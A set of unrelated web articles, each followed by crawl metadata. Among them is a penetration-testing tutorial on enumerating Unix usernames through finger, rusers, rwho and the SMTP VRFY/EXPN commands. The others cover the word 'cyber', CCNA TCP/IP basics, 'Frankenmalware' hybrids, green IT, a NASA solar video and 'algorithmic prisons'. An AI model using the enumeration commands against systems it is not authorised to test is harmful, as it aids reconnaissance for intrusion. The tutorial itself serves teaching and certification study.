In today’s parlance, ‘cyber’ clearly equates to ‘digital’. With all due respect to Norbart Wiener, and his groundbreaking work in the field of cybernetics, a prefix inspired by the Greek word for ‘steersman or rudder’ has been hijacked by 30 years of speculative fiction, losing its association with the esoteric concepts of ‘control’ and ‘systems’.
For the overwhelming majority of people, ‘cyberspace’ refers to the Internet, and by extension, anything with an IP address. Cybersecurity essentially applies to the realm of all that is digital, be it an office computer, a personal table, operational technology, or next year’s digital refrigerator. While the term certainly implies the role of Internet connectivity, that distinction is becoming less significant for the inhabitants of an ‘Internet of things’.
The good news is that we no longer have to be worried about paper. The self-identified practitioners of ‘Information Security’ have spent the last 20 years grappling with the dilemma of the printed page, and to a lesser degree, with the implications of human memory. Cybersecurity means freedom from the thankless task of trying to protect information outside of the digital realm.
Computer Security is dead; long live computer security. I wonder what they will come up with next.
Comments or opinions expressed on this blog are those of the individual contributors only, and do not necessarily represent the views of Gartner, Inc. or its management. Readers may copy and redistribute blog postings on other blogs, or otherwise for private, non-commercial or journalistic purposes, with attribution to Gartner. This content may not be used for any other purposes in any other formats or media. The content on this blog is provided on an "as-is" basis. Gartner shall not be liable for any damages whatsoever arising out of the content or use of this blog. | <urn:uuid:4c9340be-806f-431b-83cd-e07224503dc4> | CC-MAIN-2017-04 | http://blogs.gartner.com/jay-heiser/2013/09/13/cyber/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00059-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.920305 | 734 | 2.5625 | 3 |
One of the first activities while conducting a penetration test in Unix environments is to perform a user enumeration in order to discover valid usernames.In this article we will examine how we can manually discover usernames based on the services that are running.
Lets say that we have perform a port scan with Nmap on our host and we have discover that the finder daemon is running on port 79.
We can use the finger command in order to enumerate the users on this remote machine.For example if we execute the command finger @host we will get the following output.
As you can see the root user is the only account which is logged on the remote host.Now that we have a specific username we can use it in order to obtain more information about this user with the command finger root@host.
As the image indicates the finger command obtained information about the name,the home directory,login name and shell.Also we can see that the root user doesn’t have a .plan file.
Another effective use of the finger command is when you use it with the following syntax: finger user@host
This specific command will enumerate all user accounts that have the string user.Alternatively you can use other words instead of user like admin,account and project.
Older versions of Solaris that run the finger daemon are affected by an enumeration bugs.For example you can run the command finger 0@host and it will enumerate all users with an empty GCOS field in the password file.Additionally you can run finger ‘a b c d e f g h’@host and it will enumerate all users on the remote target.
In SunOS there are RPC services that allow also user enumeration.For example the command rusers will return a list with the users that are logged into machines on the local network.Alternatively if you are looking for the list of a specific host you can combine it with rusers -al host.
Another option is the rwho command which can be used also to enumerate network users.All the systems that are running the rwhod daemon will respond and an output will produced of the users that are currently logged in to these systems.This service runs at 513 (UDP) port.
If you discover a host which is running an SMTP service (port 25) you can also use it for username enumeration.We can connect through telnet to the mail server and then we can execute the command help in order to see the available commands.
As you can see from the image above there are plenty of commands but the commands that we will need for the discovery of valid usernames are the VRFY and EXPN.
The image above indicates that we have successfully verify the existence of two users root and admin.
In production systems it is almost impossible to find any of these services running due to this information leakage.However many Linux distributions include these daemons as part of their default installation.
In nowadays this process can be done automatically through the nmap script engine but it is good to know also how you can manually discover usernames in Unix systems.Also many commercial certifications are still requiring from you to know how to enumerate users with these commands. | <urn:uuid:4ce3c39b-2532-44da-a586-286f894241d6> | CC-MAIN-2017-04 | https://pentestlab.blog/2012/04/10/unix-user-enumeration/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279379.41/warc/CC-MAIN-20170116095119-00059-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.913594 | 665 | 2.609375 | 3 |
In preparation of your CCNA exam, we want to make sure we cover the various concepts that we could see on your Cisco CCNA exam. So to assist you, below we will discuss the foundation of the CCNA exam; Cisco TCP/IP. As you progress through your CCNA exam studies, I am sure with repetition you will find this topic becomes easier. So even though it may be a difficult concept and confusing at first, keep at it as no one said getting your Cisco certification would be easy!
In the two decades since their invention, the heterogeneity of networks has expanded further with the deployment of Ethernet, Token Ring, Fiber Distributed Data Interface (FDDI), X.25, Frame Relay, Switched Multimegabit Data Service (SMDS), Integrated Services Digital Network (ISDN), and most recently, Asynchronous Transfer Mode (ATM). The Internet protocols are the best proven approach to internetworking this diverse range of LAN and WAN technologies.
The Internet Protocol suite includes not only lower-level specifications, such as Transmission Control Protocol (TCP) and Internet Protocol (IP), but specifications for such common applications as electronic mail, terminal emulation, and file transfer. Figure 1 shows the TCP/IP protocol suite in relation to the OSI Reference model. Figure 2 shows some of the important Internet protocols and their relationship to the OSI Reference Model. For information on the OSI Reference model and the role of each layer, please refer to the document Internetworking Basics.
The Internet protocols are the most widely implemented multivendor protocol suite in use today. Support for at least part of the Internet Protocol suite is available from virtually every computer vendor.
This section describes technical aspects of TCP, IP, related protocols, and the environments in which these protocols operate. Because the primary focus of this document is routing (a layer 3 function), the discussion of TCP (a layer 4 protocol) will be relatively brief.
TCP is a connection-oriented transport protocol that sends data as an unstructured stream of bytes. By using sequence numbers and acknowledgment messages, TCP can provide a sending node with delivery information about packets transmitted to a destination node. Where data has been lost in transit from source to destination, TCP can retransmit the data until either a timeout condition is reached or until successful delivery has been achieved. TCP can also recognize duplicate messages and will discard them appropriately. If the sending computer is transmitting too fast for the receiving computer, TCP can employ flow control mechanisms to slow data transfer. TCP can also communicates delivery information to the upper-layer protocols and applications it supports. All these characteristics makes TCP an end-to-end reliable transport protocol. TCP is specified in RFC 793 .
Figure 1 TCP/IP Protocol Suite in Relation to the OSI Reference Model
Figure 2 Important Internet Protocols in Relation to the OSI Reference Model
Refer to the TCP section of Internet Protocols for more information.
IP is the primary Layer 3 protocol in the Internet suite. In addition to internetwork routing, IP provides error reporting and fragmentation and reassembly of information units called datagrams for transmission over networks with different maximum data unit sizes. IP represents the heart of the Internet Protocol suite.
Note: The term IP in the section refers to IPv4 unless otherwise stated explicitly.
IP addresses are globally unique, 32-bit numbers assigned by the Network Information Center. Globally unique addresses permit IP networks anywhere in the world to communicate with each other.
An IP address is divided into two parts. The first part designates the network address while the second part designates the host address.
The IP address space is divided into different network classes. Class A networks are intended mainly for use with a few very large networks, because they provide only 8 bits for the network address field. Class B networks allocate 16 bits, and Class C networks allocate 24 bits for the network address field. Class C networks only provide 8 bits for the host field, however, so the number of hosts per network may be a limiting factor. In all three cases, the left most bit(s) indicate the network class. IP addresses are written in dotted decimal format; for example, 18.104.22.168. Figure 3 shows the address formats for Class A, B, and C IP networks.
Figure 3 Address Formats for Class A, B, and C IP Networks
IP networks also can be divided into smaller units called subnetworks or “subnets.” Subnets provide extra flexibility for the network administrator. For example, assume that a network has been assigned a Class A address and all the nodes on the network use a Class A address. Further assume that the dotted decimal representation of this network's address is 22.214.171.124. (All zeros in the host field of an address specify the entire network.) The administrator can subdivide the network using subnetting. This is done by “borrowing” bits from the host portion of the address and using them as a subnet field, as depicted in Figure 4.
Figure 4 “Borrowing” Bits
If the network administrator has chosen to use 8 bits of subnetting, the second octet of a Class A IP address provides the subnet number. In our example, address 126.96.36.199 refers to network 34, subnet 1; address 188.8.131.52 refers to network 34, subnet 2, and so on.
The number of bits that can be borrowed for the subnet address varies. To specify how many bits are used to represent the network and the subnet portion of the address, IP provides subnet masks. Subnet masks use the same format and representation technique as IP addresses. Subnet masks have ones in all bits except those that specify the host field. For example, the subnet mask that specifies 8 bits of subnetting for Class A address 184.108.40.206 is 255.255.0.0. The subnet mask that specifies 16 bits of subnetting for Class A address 220.127.116.11 is 255.255.255.0. Both of these subnet masks are pictured in Figure 5. Subnet masks can be passed through a network on demand so that new nodes can learn how many bits of subnetting are being used on their network.
Figure 5 Subnet Masks
Traditionally, all subnets of the same network number used the same subnet mask. In other words, a network manager would choose an eight-bit mask for all subnets in the network. This strategy is easy to manage for both network administrators and routing protocols. However, this practice wastes address space in some networks. Some subnets have many hosts and some have only a few, but each consumes an entire subnet number. Serial lines are the most extreme example, because each has only two hosts that can be connected via a serial line subnet.
As IP subnets have grown, administrators have looked for ways to use their address space more efficiently. One of the techniques that has resulted is called Variable Length Subnet Masks (VLSM). With VLSM, a network administrator can use a long mask on networks with few hosts and a short mask on subnets with many hosts. However, this technique is more complex than making them all one size, and addresses must be assigned carefully.
Of course in order to use VLSM, a network administrator must use a routing protocol that supports it. Cisco routers support VLSM with Open Shortest Path First (OSPF), Integrated Intermediate System to Intermediate System (Integrated IS-IS), Enhanced Interior Gateway Routing Protocol (Enhanced IGRP), and static routing. Refer to IP Addressing and Subnetting for New Users for more information about IP addressing and subnetting.
On some media, such as IEEE 802 LANs, IP addresses are dynamically discovered through the use of two other members of the Internet protocol suite: Address Resolution Protocol (ARP) and Reverse Address Resolution Protocol (RARP). ARP uses broadcast messages to determine the hardware (MAC layer) address corresponding to a particular network-layer address. ARP is sufficiently generic to allow use of IP with virtually any type of underlying media access mechanism. RARP uses broadcast messages to determine the network-layer address associated with a particular hardware address. RARP is especially important to diskless nodes, for which network-layer addresses usually are unknown at boot time.
Routing in IP Environments
An “internet” is a group of interconnected networks. The Internet, on the other hand, is the collection of networks that permits communication between most research institutions, universities, and many other organizations around the world. Routers within the Internet are organized hierarchically. Some routers are used to move information through one particular group of networks under the same administrative authority and control. (Such an entity is called an autonomous system.) Routers used for information exchange within autonomous systems are called interior routers, and they use a variety of interior gateway protocols (IGPs) to accomplish this end. Routers that move information between autonomous systems are called exterior routers; they use the Exterior Gateway Protocol (EGP) or Border Gateway Protocol (BGP). Figure 6 shows the Internet architecture.
Figure 6 Representation of the Internet Architecture
Routing protocols used with IP are dynamic in nature. Dynamic routing requires the software in the routing devices to calculate routes. Dynamic routing algorithms adapt to changes in the network and automatically select the best routes. In contrast with dynamic routing, static routing calls for routes to be established by the network administrator. Static routes do not change until the network administrator changes them.
IP routing tables consist of destination address/next hop pairs. This sample routing table from a Cisco router shows that the first entry is interpreted as meaning “to get to network 18.104.22.168 (subnet 1 on network 34), the next stop is the node at address 22.214.171.124”:
R6-2500# show ip route
Codes: C – connected, S – static, I – IGRP, R – RIP, M – mobile, B – BGP
D – EIGRP, EX – EIGRP external, O – OSPF, IA – OSPF inter area
N1 – OSPF NSSA external type 1, N2 – OSPF NSSA external type 2
E1 – OSPF external type 1, E2 – OSPF external type 2, E – EGP
i – IS-IS, su – IS-IS summary, L1 – IS-IS level-1, L2 – IS-IS level-2
ia – IS-IS inter area, * – candidate default, U – per-user static route
o – ODR, P – periodic downloaded static route
Gateway of last resort is not set
126.96.36.199/16 is subnetted, 1 subnets
188.8.131.52/24 is subnetted, 1 subnets
C 184.108.40.206 is directly connected, Serial0
As we have seen, IP routing specifies that IP datagrams travel through an internetwork one router hop at a time. The entire route is not known at the outset of the journey. Instead, at each stop, the next router hop is determined by matching the destination address within the datagram with an entry in the current node's routing table. Each node's involvement in the routing process consists only of forwarding packets based on internal information. IP does not provide for error reporting back to the source when routing anomalies occur.
This task is left to another Internet protocol the Internet Control Message Protocol (ICMP).
ICMP performs a number of tasks within an IP internetwork. In addition to the principal reason for which it was created (reporting routing failures back to the source), ICMP provides a method for testing node reachability across an internet (the ICMP Echo and Reply messages), a method for increasing routing efficiency (the ICMP Redirect message), a method for informing sources that a datagram has exceeded its allocated time to exist within an internet (the ICMP Time Exceeded message), and other helpful messages. All in all, ICMP is an integral part of any IP implementation, particularly those that run in routers. See the Related Information section of this document for more information on ICMP.
Interior Routing Protocols
Interior Routing Protocols (IGPs) operate within autonomous systems. The following sections provide brief descriptions of several IGPs that are currently popular in TCP/IP networks. For additional information on these protocols, please refer to the links in the Related Information section below.
A discussion of routing protocols within an IP environment must begin with the Routing Information Protocol (RIP). RIP was developed by Xerox Corporation in the early 1980s for use in Xerox Network Systems (XNS) networks. Today, many PC networks use routing protocols based on RIP.
RIP works well in small environments but has serious limitations when used in larger internetworks. For example, RIP limits the number of router hops between any two hosts in an internet to 16. RIP is also slow to converge, meaning that it takes a relatively long time for network changes to become known to all routers. Finally, RIP determines the best path through an internet by looking only at the number of hops between the two end nodes. This technique ignores differences in line speed, line utilization, and all other metrics, many of which can be important factors in choosing the best path between two nodes. For this reason, many companies with large internetworks are migrating away from RIP to more sophisticated routing protocols.
With the creation of the Interior Gateway Routing Protocol (IGRP) in the early 1980s, Cisco Systems was the first company to solve the problems associated with using RIP to route datagrams between interior routers. IGRP determines the best path through an internet by examining the bandwidth and delay of the networks between routers. IGRP converges faster than RIP, thereby avoiding the routing loops caused by disagreement over the next routing hop to be taken. Further, IGRP does not share RIP's hop count limitation. As a result of these and other improvements over RIP, IGRP enabled many large, complex, topologically diverse internetworks to be deployed.
Cisco has enhanced IGRP to handle the increasingly large, mission-critical networks being designed today. This enhanced version of IGRP is called Enhanced IGRP. Enhanced IGRP combines the ease of use of traditional distance vector routing protocols with the fast rerouting capabilities of the newer link state routing protocols.
Enhanced IGRP consumes significantly less bandwidth than IGRP because it is able to limit the exchange of routing information to include only the changed information. In addition, Enhanced IGRP is capable of handling AppleTalk and Novell IPX routing information, as well as IP routing information.
OSPF was developed by the Internet Engineering Task Force (IETF) as a replacement for RIP. OSPF is based on work started by John McQuillan in the late 1970s and continued by Radia Perlman and Digital Equipment Corporation (DEC) in the mid-1980s. Every major IP routing vendor supports OSPF.
OSPF is an intradomain, link state, hierarchical routing protocol. OSPF supports hierarchical routing within an autonomous system. Autonomous systems can be divided into routing areas. A routing area is typically a collection of one or more subnets that are closely related. All areas must connect to the backbone area.
OSPF provides fast rerouting and supports variable length subnet masks.
ISO 10589 (IS-IS) is an intradomain, link state, hierarchical routing protocol used as the DECnet Phase V routing algorithm. It is similar in many ways to OSPF. IS-IS can operate over a variety of subnetworks, including broadcast LANs, WANs, and point-to-point links.
Integrated IS-IS is an implementation of IS-IS for more than just OSI protocols. Today, Integrated IS-IS supports both OSI and IP protocols.
Like all integrated routing protocols, Integrated IS-IS calls for all routers to run a single routing algorithm. Link state advertisements sent by routers running Integrated IS-IS include all destinations running either IP or OSI network-layer protocols. Protocols such as ARP and ICMP for IP and End System-to-Intermediate System (ES-IS) for OSI must still be supported by routers running Integrated IS-IS.
Exterior Routing Protocols
EGPs provide routing between autonomous systems. The two most popular EGPs in the TCP/IP community are discussed in this section.
The first widespread exterior routing protocol was the Exterior Gateway Protocol. EGP provides dynamic connectivity but assumes that all autonomous systems are connected in a tree topology. This was true in the early Internet but is no longer true.
Although EGP is a dynamic routing protocol, it uses a very simple design. It does not use metrics and therefore cannot make true intelligent routing decisions. EGP routing updates contain network reachability information. In other words, they specify that certain networks are reachable through certain routers. Because of its limitations with regard to today's complex internetworks, EGP is being phased out in favor of routing protocols such as BGP.
BGP represents an attempt to address the most serious of EGP's problems. Like EGP, BGP is an interdomain routing protocol created for use in the Internet core routers. Unlike EGP, BGP was designed to prevent routing loops in arbitrary topologies and to allow policy-based route selection.
BGP was co-authored by a Cisco founder, and Cisco continues to be very involved in BGP development. The latest revision of BGP, BGP4, was designed to handle the scaling problems of the growing Internet.
Cisco's TCP/IP Implementation
In addition to IP and TCP, the Cisco TCP/IP implementation supports ARP, RARP, ICMP, Proxy ARP (in which the router acts as an ARP server on behalf of another device), Echo, Discard, and Probe (an address resolution protocol developed by Hewlett-Packard Company and used on IEEE 802.3 networks). Cisco routers also can be configured to use the Domain Name System (DNS) when host name-to-address mappings are needed.
IP hosts need to know how to reach a router. There are several ways this can be done:
- Add a static route in the host pointing to a router.
- Run RIP or some other IGP on the host.
- Run the ICMP Router Discovery Protocol (IRDP) in the host.
- Run Proxy ARP on the router.
Cisco routers support all of these methods.
Cisco provides many TCP/IP value-added features that enhance applications availability and reduce the total cost of internetwork ownership. The most important of these features are described in the following section.
Most networks have reasonably straightforward access requirements. To address these issues, Cisco implements access lists, a scheme that prevents certain packets from entering or leaving particular networks.
An access list is a sequential list of instructions to either permit or deny access through a router interface based on IP address or other criteria. For example, an access list could be created to deny access to a particular resource from all computers on one network segment but permit access from all other segments. Another access list could be used to permit TCP connections from any host on a local segment to any host in the Internet but to deny all connections from the Internet into the local net except for electronic mail connections to a particular designated mail host. Access lists are extremely flexible, powerful security measures and are available not only for IP, but for many other protocols supported by Cisco routers.
Other access restrictions are provided by the Department of Defense-specified security extensions to IP. Cisco supports both the Basic and the Extended security options as described in RFC 1108 of the IP Security Option (IPSO). Support of both access lists and the IPSO makes Cisco a good choice for networks where security is an issue.
Cisco's TCP/IP implementation includes several schemes that allow foreign protocols to be tunneled through an IP network. Tunneling allows network administrators to extend the size of AppleTalk and Novell IPX networks beyond the size that their native protocols can handle.
The applications that use the TCP/IP protocol suite continue to evolve. The next set of applications on which a lot of work is being done include those that use video and audio information. Cisco continues to be actively involved with the Internet Engineering Task Force (IETF) in defining standards that will enable network administrators to add audio and video applications to their existing networks. Cisco supports the Protocol Independent Multicast (PIM) standard. In addition, Cisco's implementation provides interoperability with the MBONE, a research multicast backbone that exists today.
IP multicasting (the ability to send IP datagrams to multiple nodes in a logical group) is an important building block for applications such as video. Video teleconferencing, for example, requires the ability to send video information to multiple teleconference sites. If one IP multicast datagram containing video information can be sent to multiple teleconference sites, network bandwidth is saved and time synchronization is closer to optimal.
Suppressing Network Information
In some cases, it may be useful to suppress information about certain networks. Cisco routers provide an extensive set of configuration options that allow an administrator to tailor the exchange of routing information within a particular routing protocol. Both incoming and outgoing information can be controlled using a set of commands designed for this purpose. For example, networks can be excluded from routing advertisements, routing updates can be prevented from reaching certain networks, and other similar actions can be taken.
In large networks, some routers and routing protocols are more reliable sources of routing information than others. Cisco IP routing software permits the reliability of information sources to be quantified by the network administrator with the administrative distance metric. When administrative distance is specified, the router can select between sources of routing information based on the reliability of the source. For example, if a router uses both IGRP and RIP, one might set the administrative distances to reflect greater confidence in the IGRP information. The router would then use IGRP information when available. If the source of IGRP information failed, the router automatically would use RIP information as a backup until the IGRP source became available again.
Routing Protocol Redistribution
Translation between two environments using different routing protocols requires that routes generated by one protocol be redistributed into the second routing protocol environment. Route redistribution gives a company the ability to run different routing protocols in workgroups or areas where each is particularly effective. By not restricting customers to using only a single routing protocol, Cisco's route redistribution feature minimizes cost while maximizing technical advantage through diversity.
Cisco permits routing protocol redistribution between any of its supported routing protocols. Static route information can also be redistributed. Further, defaults can be assigned so that one routing protocol can use the same metric for all redistributed routes, thereby simplifying the routing redistribution mechanism.
Serverless Network Support
Cisco pioneered the mechanisms that allow network administrators to build serverless networks. Helper addresses, RARP, and BOOTP allow network administrators to place servers far away from the workstations that depend on them, thereby easing network design constraints.
Network Monitoring and Debugging
With today's complex, diverse network topologies, a router's ability to aid the monitoring and debugging process is critical. As the junction point for multiple segments, a router sees more of the complete network than most other devices. Many problems can be detected and/or solved using information that routinely passes through the router.
The Cisco IP routing implementation provides commands that display:
- The current state of the routing table, including the routing protocol that derived the route, the reliability of the source, the next IP address to send to, the router interface to use, whether the network is subnetted, whether the network in question is directly connected, and any routing metrics.
- The current state of the active routing protocol process, including its update interval, metric weights (if applicable), active networks for which the routing process is functioning, and routing information sources.
- The active accounting database, including the number of packets and bytes exchanged between particular sources and destinations.
- The contents of the IP cache, including the destination IP address, the interface through which that destination is reached, the encapsulation method used, and the hardware address found at that destination.
IP-related interface parameters, including whether the interface and interface physical layer hardware are up, whether certain protocols (such as ICMP and Proxy ARP) are enabled, and the current security level.
- IP-related protocol statistics, including the number of packets and number of errors received and sent by the following protocols: IP, TCP, User Datagram Protocol (UDP), EGP, IGRP, Enhanced IGRP, OSPF, IS-IS, ARP, and Probe.
- Logging of all BGP, EGP, ICMP, IGRP, Enhanced IGRP, OSPF, IS-IS, RIP, TCP, and UDP transactions.
- The number of intermediate hops taken as a packet traverses the network.
- Reachability information between nodes.
We hope you found this Cisco certification article helpful. We pride ourselves on not only providing top notch Cisco CCNA exam information, but also providing you with the real world Cisco CCNA skills to advance in your networking career. | <urn:uuid:5f0fbea6-920f-4266-9199-bf9714205a5b> | CC-MAIN-2017-04 | https://www.certificationkits.com/cisco-tcpip/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00113-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9125 | 5,284 | 3.109375 | 3 |
Security researcher Loredana Botezatu claims that BitDefender has found “no less than 40,000 such malware symbioses out of a sample pool of 10 million files.” She believes that most of these have evolved naturally, but is concerned that they pose a new and worrying threat. “Although this happens unintentionally, the combined features from both pieces of malware will inflict a lot more damage than the creators of either piece of malware intended.”
The research describes a specific example it has found: the Rimecud worm infected with the Virtob file infector. It describes a potentially worrying scenario. “That PC faces a twofold malware with twice as many command and control servers to query for instructions; moreover, there are two backdoors open, two attack techniques active and various spreading methods put in place. Where one fails, the other succeeds.”
Furthermore, she adds that if you get one of these hybrids on your system, “you could be facing financial troubles, computer problems, identity theft, and a wave of spam thrown in as a random bonus,” says Loredana Botezatu. “The advent of malware sandwiches throws a new twist into the world of malware. They spread more efficiently, and will become increasingly difficult to predict.”
Should we be afraid? Well, we need to look at this objectively. One effect highlighted by the report is that the new Frankenmalware changes the detection signature of both the original virus and the original worm, making it impossible to detect. But malware does this all the time, either by the application of a malware kit or sometimes via code within the malware itself. Anti-virus products are designed to detect such ‘new’ malware by their actions rather than their signatures.
So the bottom line is this. BitDefender’s research is accurate. What it dubs Frankenmalware is inevitable. Theoretically, everything it describes is a possible outcome. But while the evolution might be factual, the potential threat is hypothetical. Malware plus malware is still malware; neither more nor less. And the anti-malware industry, including BitDefender, is very good at controlling it. | <urn:uuid:fc2e625c-ba28-40e0-9321-42aec0d3339a> | CC-MAIN-2017-04 | https://www.infosecurity-magazine.com/news/viruses-and-worms-are-evolving-into-frankenmalware/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281263.12/warc/CC-MAIN-20170116095121-00113-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.932559 | 454 | 2.578125 | 3 |
IT in 2009: Greener Pastures?
Think of a data center. Picture rows upon rows of storage racks, all humming away in a warehouse somewhere. Now imagine how much energy is required to keep it running.
The IT industry is notorious for generating a massive carbon footprint. According to an article by Robert Petrocelli of the Computer Technology Review, a single rack of storage enclosures using 6 kilowatts generates 40 tons of carbon dioxide — as much as six 1999 Chevy Tahoe SUVs. Petrocelli added that “most storage systems represent the equivalent of perpetually idling an SUV in the garage on the off chance the owner might want to take a drive.”
Further, a report in The McKinsey Quarterly found that the increasing carbon footprint associated with information and communications technologies — everything from computers, data centers and networks to mobile phones and telecommunications systems — could make them the biggest source of greenhouse gas emissions by 2020. The report went on to say that “emissions from the manufacture and use of PCs alone will double for the next 12 years as middle-class buyers in emerging economies go digital.”
But there’s hope. New research — also presented in the McKinsey Quarterly article — suggests these very same technologies can be used to make the world economy more energy and carbon efficient. The study found that such technologies could eliminate nearly 8 metric gigatons of greenhouse gas emissions annually by 2020, which translates to five times the estimated emissions from these technologies.
OK, you might say. But how?
The McKinsey report took a look at the role of technology in five main categories: buildings, power, transport, manufacturing and telecommuting. It then identified areas of savings within each sector and added them all up.
For example, in buildings, more sophisticated technology can monitor lighting, heating and ventilation systems to save an estimated 1.68 metric gigatons of global emissions a year, according to the research.
In the manufacturing industry, “smart controls can make motor systems in factories more efficient,” according to the report. “The use of information and communications technologies to optimize the energy efficiency of motors in China’s plants, for example, could cut emissions by 200 metric megatons a year, as much as the Netherlands produces today.”
In the power sector, the article suggests using sensors in grids to monitor distribution more efficiently. “One grid in India that used information and communications technologies to monitor electricity flows reduced its losses from the transmission and distribution of power by 15 percent,” the authors wrote.
Finally, using technology to manage truck logistics and promote collaboration could reduce emissions globally, the report stated.
When it comes to IT infrastructure itself, there are additional things that companies can do to “green” their businesses. Petrocelli cites an August 2007 EPA report that states the energy consumed by U.S. data centers alone will account for a whopping 2.5 percent of the nation’s total energy consumption in the next five years. So clearly, starting with data centers is probably our best bet.
That said, Petrocelli offered a few options. One is the use of storage virtualization applications that permit aggregation of disparate systems into a universally accessible pool. Data deduplication and wire-speed compression applications are another option, as they can reduce the amount of overall data to be stored. A final suggestion is the implementation of massive array of idle disks (MAID) devices that ultimately can reduce the electrical and cooling requirements for storage. However, Petrocelli warned that MAID devices only work when the underlying on-disk data requirements are compatible.
OK, so IT as an industry has the potential to be very environmentally friendly, you might say. But what does this have to do with me?
“If governments introduce a price on carbon emissions or if energy prices rise (or both), the increased costs of production could be passed on to buyers,” the McKinsey article states.
The good news, however, is that “this would challenge IT managers and companies that purchase IT and telecom equipment in large quantities to rethink the way they manage the demand for and supply of IT services, as well as their use of IT applications,” the article said. “At the same time, companies that make everything from control devices to computer components, software to networking gear, will have a big incentive to invest in energy-saving products and services and thus help to reduce greenhouse gas emissions.”
The bottom line for IT professionals is, “Increasing demand for information and communications technologies that promote abatement will create attractive growth opportunities for those companies.”
It looks like 2009 could spell greener pastures for IT professionals with a little creativity.
– Agatha Gilmore, firstname.lastname@example.org | <urn:uuid:b37b6c59-8376-45fd-ac86-66873057fcaa> | CC-MAIN-2017-04 | http://certmag.com/it-in-2009-greener-pastures/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282110.46/warc/CC-MAIN-20170116095122-00021-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94131 | 989 | 3.15625 | 3 |
The following information comes from NASA.
This video shows three years of the sun recorded by NASA's Solar Dynamics Observatory (SDO) at a pace of two images per day.
The images shown here are based on a wavelength of 171 Angstroms, which is in the extreme ultraviolet range and shows solar material at around 600,000 Kelvin.
During the course of the video, the sun subtly increases and decreases in apparent size. This is because the distance between the SDO spacecraft and the sun varies over time. The image is, however, remarkably consistent and stable despite the fact that SDO orbits the Earth at 6,876 miles per hour and the Earth orbits the sun at 67,062 miles per hour.
There are several important events that appear briefly in this video. They include the two partial eclipses of the sun by the moon, two roll maneuvers, the largest flare of this solar cycle, comet Lovejoy, and the transit of Venus. The specific time for each event is listed below.
00:30 Partial eclipse by the moon
00:31 Roll maneuver
01:11 August 9, 2011 X6.9 Flare, currently the largest of this solar cycle
01:28 Comet Lovejoy, December 15, 2011
01:42 Roll Maneuver
01:51 Transit of Venus, June 5, 2012
02:28 Partial eclipse by the moon
This video comes via NASAexplorer. | <urn:uuid:3531ce21-f9f6-4384-ab25-1cb4b9b7aad4> | CC-MAIN-2017-04 | http://www.cio.com/article/2370459/internet/three-years-of-the-sun-in-three-minutes.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282140.72/warc/CC-MAIN-20170116095122-00443-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.91232 | 292 | 3.640625 | 4 |
Corporations and government are using information about us in a new – and newly insidious – way. Employing massive data files, much of the information taken from the Internet, they profile us, predict our good or bad character, credit worthiness, behavior, tastes, and spending habits – and take actions accordingly.
As a result, millions of Americans are now virtually incarcerated in algorithmic prisons.
Some can no longer get loans or cash checks. Others are being offered only usurious credit card interest rates. Many have trouble finding employment because of their Internet profiles. Others may have trouble purchasing property, life, and automobile insurance because of algorithmic predictions. Algorithms may select some people for government audits, while leaving others to find themselves undergoing gratuitous and degrading airport screening.
An estimated 500 Americans have their names on no-fly lists. Thousands more are targeted for enhanced screening by the Automated Targeting System algorithm used by the Transportation Security Administration. By using dataincluding "tax identification number, past travel itineraries, property records, physical characteristics, and law enforcement or intelligence information" the algorithm is expected to predict how likely a passenger is to be dangerous.
Algorithms also constrain our lives in virtual space. They determine what products we will be exposed to. They analyze our interests and play an active role in selecting the things we see when we go to a particular website..
Eli Pariser, argues in The Filter Bubble, "You click on a link, which signals your interest in something, which means you are more likely to see articles about that topic" and then "You become trapped in a loop…" The danger being that you emerge with a very distorted view of the world.
If you’re having trouble finding a job as a software engineer, it may be because you got a low score from the Gild, a company that predicts the skill of programmers by evaluating the open source code they have written, the language they use on LinkedIn, and how they answer questions on software social forums
Algorithmic prisons are not new.. Even before the Internet, credit reporting and rating agencies were a power in our economy. Fitch’s, Moody’s, and Standard and Poor’s have been rating business credit for decades. Equifax, the oldest credit rating agency, was founded in 1899.
When algorithms get it right (and in general they do a pretty good job), they provide extremely valuable services to the economy. They make our lives safer. They make it easier to find the products and services we want. Amazon constantly alerts me to books it correctly predicts I will want to read. They increase the efficiency of businesses.
But when algorithms get it wrong, real suffering follows.
Most of us would not be concerned if ten or a hundred times too many people ended up on the TSA’s enhanced airport screening list as long as an airplane hijacking was avoided. In times when jobs are scarce and applicants many, most employers would opt for tighter algorithmic screening. There are lots of candidates to hire and more harm may be done by hiring a bad apple than by missing a potentially good new employee. And avoiding bad loans is key to the success of banks. Missing out on a few good ones in return for avoiding a big loss is a decent trade off.
But we’ve reached the point where, inmany cases, private companies and public institutions stand to gain more than they will lose if a lot of innocent people end up in algorithmic prison.
An related concern is this: Surveillance has become automated through the use of Internet tools, capturing data from cellular phones, low cost cameras, and the ability of economically analyze big databases. As a result, it has become much easier -- and a lot less costly -- to construct algorithmic prisons. Not only can we expect to see a great increase in the number of algorithmic prisons, but thanks to cheaper and more efficient tools the value derived from establishing them will increase.
A number of services already facilitate the creation of algorithmic prisons. Axciom, for instance, a marketing services company, monitors 50 trillion transactions annually and maintains about 1,500 data points on 500 million consumers worldwide. That same database can serve as a key component in the construction of an algorithmic prison.
There are other features of algorithmic prisons that a latter-day antagonist in a tale by Kafka might have dreamed up. A consumer or job seeker might know only that he has trouble getting credit or a job interview. What he may not know is that the bars of an invisible prison are keeping him from reaching his goal.
The federal Consumer Financial Protection Bureau lists more than 40 consumer-reporting companies. These are services that provide reports for banks, check cashers, payday lenders, auto and property insurers, utilities, gambling establishments, rental companies, medical insurers, and companies wanting to check out employment history. The good news is that the Fair Credit Reporting Act requires those companies to give consumers annual access to their reports and allows a consumer to complain to the Consumer Financial Protection Bureau if he is being treated unfairly.
Good luck with that.
